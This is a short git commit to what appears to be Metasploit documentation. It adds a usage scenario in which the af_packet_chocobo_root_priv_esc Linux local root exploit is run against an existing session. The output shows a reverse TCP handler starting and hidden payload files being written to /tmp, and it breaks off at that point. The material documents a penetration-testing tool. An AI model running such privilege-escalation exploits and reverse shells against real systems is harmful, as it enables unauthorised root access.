Update documentation

GSoC/Meterpreter_Web_Console
Brendan Coles 2018-05-07 07:15:17 +00:00
parent 4574de76e7
commit 2331a610d6
1 changed files with 4 additions and 0 deletions

View File

@ -70,6 +70,10 @@
## Scenarios
```
msf5 > use exploit/linux/local/af_packet_chocobo_root_priv_esc
msf5 exploit(linux/local/af_packet_chocobo_root_priv_esc) > set session 1
session => 1
msf5 exploit(linux/local/af_packet_chocobo_root_priv_esc) > run
[*] Started reverse TCP handler on 172.16.191.188:4444
[*] Writing '/tmp/.iDLrwN3S4.c' (24885 bytes) ...
[*] Writing '/tmp/.rMIvkKT' (207 bytes) ...